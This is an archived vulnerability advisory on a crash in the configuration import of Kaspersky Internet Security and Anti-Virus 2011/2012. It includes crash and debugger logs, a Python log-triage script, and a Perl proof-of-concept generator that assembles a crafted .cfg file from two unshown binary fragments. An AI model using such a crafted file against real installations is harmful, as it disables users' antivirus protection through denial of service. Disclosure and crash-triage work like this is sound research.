Kaspersky Internet Security / Anti-Virus 2011 / 2012 Memory Corruption

2011-12-20T00:00:00
ID PACKETSTORM:108043
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2011-12-20T00:00:00

Description

                                        
Title:  
======  
Kaspersky IS&AV 2011/12 - Memory Corruption Vulnerability  
  
  
Date:  
=====  
2011-12-19  
  
  
References:  
===========  
http://www.vulnerability-lab.com/get_content.php?id=129  
  
  
VL-ID:  
=====  
129  
  
  
Introduction:  
=============  
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you're surfing the web.   
It provides constant protection for you and your family – whether you work, bank, shop or play online.  
  
Kaspersky Anti-Virus 2011 – the backbone of your PC’s security system, offering real-time automated protection from   
a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning   
technologies work silently in the background while you enjoy your digital life.  
  
(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus && http://www.kaspersky.com/kaspersky_internet_security)  
  
  
Abstract:  
=========  
Vulnerability-Lab Team discovered a memory and pointer corruption vulnerability in Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012.  
  
  
Report-Timeline:  
================  
2010-12-04: Vendor Notification  
2011-01-16: Vendor Response/Feedback  
2011-12-19: Public or Non-Public Disclosure  
  
  
Status:  
========  
Published  
  
  
Affected Products:  
==================  
  
Exploitation-Technique:  
=======================  
Local  
  
  
Severity:  
=========  
Medium  
  
  
Details:  
========  
A memory corruption vulnerability was detected in Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012.   
The vulnerability is caused by an invalid pointer dereference while a corrupt .cfg file is processed by the configuration import: the   
crafted file passes the import's exception-handling filter and crashes the complete avp.exe process, which an attacker can use for a denial of service.   
The bug is located in basegui.ppl (internal name BASEGUI.DLL, "Kaspersky Anti-Virus GUI Windows part") in the .cfg file import path. The debug   
logs below show an access violation at basegui+0x79bed on "mov edx,dword ptr [ecx]" with ecx=0x9699eef0, i.e. a read through an invalid pointer   
(exception Parameter[0]=0 means a read; the WinDbg bucket string nevertheless says INVALID_POINTER_WRITE). The WER report from build 11.0.1.400   
records the same module at offset 0x79c3c, the WinDbg session against build 11.0.0.241 at offset 0x79bed. The logs do not show whether the pointer   
value is attacker-controlled, so the demonstrated impact is the process crash.   
  
  
Vulnerable Modules:   
  
[+] CFG IMPORT  
  
  
Affected Version(s):  
Kaspersky Anti-Virus 2012 & Kaspersky Internet Security 2012  
KIS 2012 v12.0.0.374  
KAV 2012 v12.x  
  
Kaspersky Anti-Virus 2011 & Kaspersky Internet Security 2011  
KIS 2011 v11.0.0.232 (a.b)  
KAV 11.0.0.400  
KIS 2011 v12.0.0.374  
  
Kaspersky Anti-Virus 2010 & Kaspersky Internet Security 2010  
  
  
--- Kaspersky Bug Logs ---  
  
Folder: ../Analyses/Crash Reports (KIS&KAV)  
  
KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp  
KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp  
KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp  
  
KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp  
KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp  
KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp  
  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp  
KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp  
  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp  
KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp  
  
Reference(s):   
../Analyses/Crash Reports (KIS&KAV)/kav_x32.rar  
../Analyses/Crash Reports (KIS&KAV)/kis_x32-win7.zip  
../Analyses/Crash Reports (KIS&KAV)/kis_x64.zip  
  
  
  
--- Service Crash Report Queue Logs ---  
  
Folder: ../Analyses/Crash Reports (Service)  
  
AppCrash_avp.exe_1d98841adaefc9689cba9c4bbd7  
AppCrash_avp.exe_434b4962a0ccbccd3c2a6bd5f95  
AppCrash_avp.exe_583f849d49fe1a714c9bd02ba4e  
AppCrash_avp.exe_5f09d49c257b515e08a6defbf11  
AppCrash_avp.exe_69cb355e72347419436f047a313  
AppCrash_avp.exe_a7a7fe58d34d13f0136d933e977  
AppCrash_avp.exe_d21fe6df9c207eac2d8c6bcacad  
AppCrash_avp.exe_d2c8cf27ba2a3f6ceaad6c44327  
AppCrash_avp.exe_ed94bb914e255192b71d1257c19  
  
  
Version=1  
EventType=APPCRASH  
EventTime=129256270253026260  
ReportType=2  
Consent=1  
UploadTime=129256270260076663  
ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6  
IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6  
WOW64=1  
Response.BucketId=1985200055  
Response.BucketTable=1  
Response.type=4  
Sig[0].Name=Application name  
Sig[0].Value=avp.exe  
Sig[1].Name=Application version  
Sig[1].Value=11.0.1.400  
Sig[2].Name=Application timestamp  
Sig[2].Value=4c2cd011  
Sig[3].Name=Fault module name  
Sig[3].Value=basegui.ppl  
Sig[4].Name=Fault module version  
Sig[4].Value=11.0.1.400  
Sig[5].Name=Fault module timestamp  
Sig[5].Value=4c2cd193  
Sig[6].Name=Exception code  
Sig[6].Value=c0000005  
Sig[7].Name=Exception offset  
Sig[7].Value=00079c3c  
DynamicSig[1].Name=OS version  
DynamicSig[1].Value=6.1.7600.2.0.0.768.3  
DynamicSig[2].Name=Locale ID  
DynamicSig[2].Value=1031  
DynamicSig[22].Name=Additional information 1  
DynamicSig[22].Value=0a9e  
DynamicSig[23].Name=Additional information 2  
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789  
DynamicSig[24].Name=Additional information 3  
DynamicSig[24].Value=0a9e  
DynamicSig[25].Name=Additional information 4  
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789  
UI[2]=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe  
UI[3]=Kaspersky Anti-Virus has stopped working  
UI[4]=Windows can check online for a solution to the problem and try to restart the program.  
UI[5]=Check online for a solution and restart the program  
UI[6]=Check online for a solution later and close the program  
UI[7]=Close the program  
LoadedModule[0]=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe  
LoadedModule[1]=C:\Windows\SysWOW64\ntdll.dll  
LoadedModule[2]=C:\Windows\syswow64\kernel32.dll  
LoadedModule[3]=C:\Windows\syswow64\KERNELBASE.dll  
...  
...  
LoadedModule[148]=C:\Windows\SysWOW64\WMVCore.DLL  
LoadedModule[149]=C:\Windows\SysWOW64\WMASF.DLL  
LoadedModule[150]=C:\Windows\SysWOW64\EhStorAPI.dll  
LoadedModule[151]=C:\Program Files (x86)\Internet Explorer\ieproxy.dll  
LoadedModule[152]=C:\Windows\SysWOW64\SAMLIB.dll  
State[0].Key=Transport.DoneStage1  
State[0].Value=1  
State[1].Key=DataRequest  
State[1].Value=Bucket=1985200055\nBucketTable=1\nResponse=1\n  
FriendlyEventName=Stopped working  
ConsentKey=APPCRASH  
AppName=Kaspersky Anti-Virus  
AppPath=C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avp.exe  
  
  
  
  
--- System Crash Report Queue Logs ---  
  
Folder: ../Analyses/Crash Reports (System)  
  
WER7A62.tmp.appcompat.txt  
WER7FFE.tmp.mdmp  
WER6127.tmp.WERInternalMetadata.xml  
  
  
  
--- Exception Log ---  
(a50.ee8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=0331e7bc ecx=9699eef0 edx=6ddf9ba0 esi=00000002 edi=00000000  
eip=76f900ed esp=0331e76c ebp=0331e808 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
  
  
  
  
--- Debug Logs ---  
FAULTING_IP:   
basegui+79bed  
6ddf9bed 8b11 mov edx,dword ptr [ecx]  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 9699eef0  
Attempt to read from address 9699eef0  
  
PROCESS_NAME: avp.exe  
  
FAULTING_MODULE: 755b0000 kernel32  
DEBUG_FLR_IMAGE_TIMESTAMP: 4c4f15cf  
MODULE_NAME: basegui  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.  
EXCEPTION_PARAMETER1: 00000000  
EXCEPTION_PARAMETER2: 9699eef0  
  
READ_ADDRESS: 9699eef0   
  
FOLLOWUP_IP:   
basegui+79bed  
6ddf9bed 8b11 mov edx,dword ptr [ecx]  
  
FAULTING_THREAD: 00000ee8  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_INVALID_POINTER_READ  
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_WRITE  
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE  
LAST_CONTROL_TRANSFER: from 6ddf9bfd to 6ddf9bed  
  
STACK_TEXT:   
0331f9b8 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bed  
0331f9f0 6ddf9bfd 0331fa54 02485068 00000001 basegui+0x79bfd  
0331fa28 6de5bd10 0331fa54 02485068 00000001 basegui+0x79bfd  
0331fa48 6de33ad0 0331fa54 000001f6 000001c2 basegui!DllUnregisterServer+0x12580  
0331fa5c 6de34320 00000200 00000000 01c201f6 basegui+0xb3ad0  
0331fa9c 6de34d45 000504b4 00000200 00000000 basegui+0xb4320  
0331fae0 6de33fdd 000504b4 00000200 00000000 basegui+0xb4d45  
0331fb30 754c6238 00000000 00000200 00000000 basegui+0xb3fdd  
0331fb5c 754f12a1 02bb0fb0 000504b4 00000200 user32!gapfnScSendMessage+0x270  
0331fbd8 754f10e2 0059afd4 02bb0fb0 000504b4 user32!SendNotifyMessageW+0x341  
0331fc28 754f11e7 00a06c90 00000000 00000200 user32!SendNotifyMessageW+0x182  
0331fc48 754c6238 000504b4 00000200 00000000 user32!SendNotifyMessageW+0x287  
0331fc74 754c68ea 754f11be 000504b4 00000200 user32!gapfnScSendMessage+0x270  
0331fcec 754c7d31 0059afd4 76db3908 000504b4 user32!gapfnScSendMessage+0x922  
0331fd4c 754c7dfa 76db3908 00000000 0331fd88 user32!LoadStringW+0x11f  
0331fd5c 754e2292 0331fe18 00000000 0331fe18 user32!DispatchMessageW+0xf  
0331fd88 754e70a9 000504b4 00000000 02485048 user32!IsDialogMessageW+0x11e  
0331fdb0 6de2e50b 000504b4 0331fe18 023d9be8 user32!IsDialogMessage+0x58  
0331fdcc 6de20c1c 0331fe18 74113b90 00000000 basegui+0xae50b  
0331fdfc 6de231a8 0331fe18 7411383c 02e260ec basegui+0xa0c1c  
0331fe50 6de07dbc 00000000 005e8228 6ddd6f8c basegui+0xa31a8  
0331fe64 72da3487 00000003 00000000 005e8244 basegui+0x87dbc  
  
  
STACK_COMMAND: ~5s; .ecxr ; kb  
SYMBOL_STACK_INDEX: 0  
SYMBOL_NAME: basegui+79bed  
FOLLOWUP_NAME: MachineOwner  
IMAGE_NAME: basegui.ppl  
BUCKET_ID: WRONG_SYMBOLS  
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_basegui.ppl!Unknown  
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/avp_exe/11_0_0_232/4be3cfb6/basegui_ppl/11_0_0_241/4c4f15cf/c0000005/00079bed.htm?Retriage=1  
  
Followup: MachineOwner  
---------  
0:005> lmvm basegui  
start end module name  
6dd80000 6df19000 basegui (export symbols) basegui.ppl  
Loaded symbol image file: basegui.ppl  
Image path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\basegui.ppl  
Image name: basegui.ppl  
Timestamp: Tue Jul 27 19:22:23 2010 (4C4F15CF)  
CheckSum: 0019E22D  
ImageSize: 00199000  
File version: 11.0.0.241  
Product version: 11.0.0.241  
File flags: 0 (Mask 3F)  
File OS: 40004 NT Win32  
File type: 1.0 App  
File date: 00000000.00000000  
Translations: 0409.04b0  
CompanyName: Kaspersky Lab ZAO  
ProductName: Kaspersky Anti-Virus  
InternalName: BASEGUI  
OriginalFilename: BASEGUI.DLL  
ProductVersion: 11.0.0.241  
FileVersion: 11.0.0.241  
FileDescription: Kaspersky Anti-Virus GUI Windows part  
LegalCopyright: Copyright © Kaspersky Lab ZAO 1997-2010.  
LegalTrademarks: Kaspersky™ Anti-Virus ® is registered trademark of Kaspersky Lab ZAO.  
0:005> .exr 0xffffffffffffffff  
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 9699eef0  
Attempt to read from address 9699eef0  
  
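The exception record above says more than the bucket string: for a STATUS_ACCESS_VIOLATION record, Parameter[0] is 0 for a read, 1 for a write and 8 for an execute (DEP) fault, and here it is 0, so the fault is a read through ecx even though the bucket string also says INVALID_POINTER_WRITE. The following script is added here as a worked triage example; it is not part of the advisory and not Kaspersky's or Vulnerability-Lab's tooling. It parses the WinDbg .exr output and the WER Sig[] lines quoted above (copied into the script as constructed samples, with the WER field names in English translation) and reports the access kind, the faulting module and offset, and a rough classification of the target address. The classification assumes a 32-bit process with the default 2 GB user/kernel split (addresses at or above 0x80000000 are not valid user-mode pointers), which is the case for the WOW64 avp.exe in the report.

```python
import re

# Constructed sample: the WinDbg ".exr" output quoted in the advisory above.
EXR_SAMPLE = """\
ExceptionAddress: 6ddf9bed (basegui+0x00079bed)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 9699eef0
Attempt to read from address 9699eef0
"""

# Constructed sample: WER signature lines from the advisory (field names translated).
WER_SAMPLE = """\
Sig[0].Name=Application name
Sig[0].Value=avp.exe
Sig[3].Name=Fault module name
Sig[3].Value=basegui.ppl
Sig[6].Name=Exception code
Sig[6].Value=c0000005
Sig[7].Name=Exception offset
Sig[7].Value=00079c3c
"""

STATUS_ACCESS_VIOLATION = 0xC0000005
# Meaning of ExceptionInformation[0] for an access violation (EXCEPTION_RECORD docs).
AV_KIND = {0: "read", 1: "write", 8: "execute (DEP)"}


def parse_exr(text):
    """Parse a WinDbg .exr dump into its address, module+offset, code and parameters."""
    m_addr = re.search(r"ExceptionAddress:\s+([0-9a-f]+)\s+\((\w+)\+0x([0-9a-f]+)\)", text)
    m_code = re.search(r"ExceptionCode:\s+([0-9a-f]+)", text)
    params = [int(p, 16) for p in re.findall(r"Parameter\[\d+\]:\s+([0-9a-f]+)", text)]
    return {
        "address": int(m_addr.group(1), 16),
        "module": m_addr.group(2),
        "offset": int(m_addr.group(3), 16),
        "code": int(m_code.group(1), 16),
        "params": params,
    }


def parse_wer_sigs(text):
    """Pair Sig[n].Name / Sig[n].Value lines of a WER Report.wer into a name->value dict."""
    names, values = {}, {}
    for line in text.splitlines():
        m = re.match(r"Sig\[(\d+)\]\.(Name|Value)=(.*)", line)
        if m:
            (names if m.group(2) == "Name" else values)[m.group(1)] = m.group(3)
    return {names[i]: values[i] for i in names if i in values}


def wer_location(sigs):
    """Fault location from WER fields in WinDbg's module+offset notation."""
    return f"{sigs['Fault module name']}+0x{int(sigs['Exception offset'], 16):x}"


def classify_target(addr, user_limit=0x80000000):
    """Rough triage of a faulting address; assumes a 32-bit process with a 2 GB user split."""
    if addr < 0x10000:
        return "null page (NULL plus small offset)"
    if addr >= user_limit:
        return "outside user range (wild or uninitialised pointer)"
    return "user range (needs further analysis for attacker control)"


def triage(exr_text):
    """Classify an .exr record: access kind, target address and where the fault occurred."""
    ex = parse_exr(exr_text)
    if ex["code"] != STATUS_ACCESS_VIOLATION:
        return {"kind": "not an access violation", **ex}
    kind = AV_KIND.get(ex["params"][0], "unknown")
    target = ex["params"][1]
    return {
        "kind": kind,
        "target": target,
        "target_class": classify_target(target),
        "where": f"{ex['module']}+0x{ex['offset']:x}",
    }


if __name__ == "__main__":
    print(triage(EXR_SAMPLE))
    print(wer_location(parse_wer_sigs(WER_SAMPLE)))
```

For the advisory's record the script reports a read from 0x9699eef0 at basegui+0x79bed with the target outside the user-mode range, i.e. a wild pointer rather than a controlled near-null dereference, and basegui.ppl+0x79c3c for the WER report from the other build. With nothing in the logs showing control over ecx, a crash (denial of service) is the impact these artifacts support, which matches the Medium rating below.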
  
Information:  
The Kaspersky .cfg file import's exception handling filters out malformed or manipulated configuration files, as the first test showed (wrong-way.png).  
The PoC file is not caught by that import exception handling and gets through without any problems. The resulting invalid pointer read/write allows  
a local attacker to crash the software via memory corruption. The technique and software used to detect the bug in the binary are private (prv8).  
  
Notice:  
A local attacker does not need to know any password to load a .cfg (configuration) file (access-rights.png).  
  
  
Folder:   
../Analyses/Debug  
  
  
References(Pictures):  
../appcrash1.png  
../appcrash2.png  
../appcrash3.png  
../appcrash4.png  
../appcrash5.png  
../debug&exception.png  
../kav2011.png  
../reproduce-x32.png  
../wrong-way.png  
../access-rights.png  
  
  
Proof of Concept:  
=================  
The vulnerability can be triggered by a local attacker via the configuration import, or by a remote attacker with user interaction (the victim must import the crafted file).   
To demonstrate or reproduce it, build the PoC .cfg with the generator below; part1.bin and part2.bin are the two file fragments shipped with the PoC.  
  
  
#!/usr/bin/perl  
# kis&kav_2011_2012_p0c.pl: writes poc_pwn.cfg as part1.bin + marker + part2.bin  
use strict;  
use warnings;  
##############################################################################  
my $code = "corrupt" x 1;          # marker inserted between the two fragments  
###################################################################  
my $FilePath1 = "part1.bin";       # leading fragment  
my $FilePath2 = "part2.bin";       # trailing fragment  
my $OutPath   = "poc_pwn.cfg";  
###################################################################  
# Truncate ('>') rather than append ('>>') so that re-running the script does  
# not stack several copies of the PoC into the same output file.  
open(my $out, '>', $OutPath) or die "cannot write $OutPath: $!";  
binmode $out;  
###################################################################  
local $/;                          # slurp mode: read each fragment in one piece  
open(my $fh1, '<', $FilePath1) or die "cannot read $FilePath1: $!";  
binmode $fh1;  
print $out <$fh1>;  
close($fh1);  
print $out $code;  
open(my $fh2, '<', $FilePath2) or die "cannot read $FilePath2: $!";  
binmode $fh2;  
print $out <$fh2>;  
close($fh2);  
close($out) or die "cannot close $OutPath: $!";  
###################################################################  
  
  
PoC:   
../PoC/kis&kav_2011_2012_p0c.pl  
../PoC/part1.bin  
../PoC/part2.bin  
  
  
Risk:  
=====  
The security risk of the bug/vulnerability is estimated as medium(+).  
  
  
Credits:  
========  
Vulnerability Research Laboratory - Benjamin K.M. (Rem0ve)  
  
  
Disclaimer:  
===========  
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,   
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-  
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business   
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some   
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation   
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-  
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of   
other media, are reserved by Vulnerability-Lab or its suppliers.  
  
Copyright © 2011|Vulnerability-Lab  
  
  
  
  
--   
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com  
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com  
  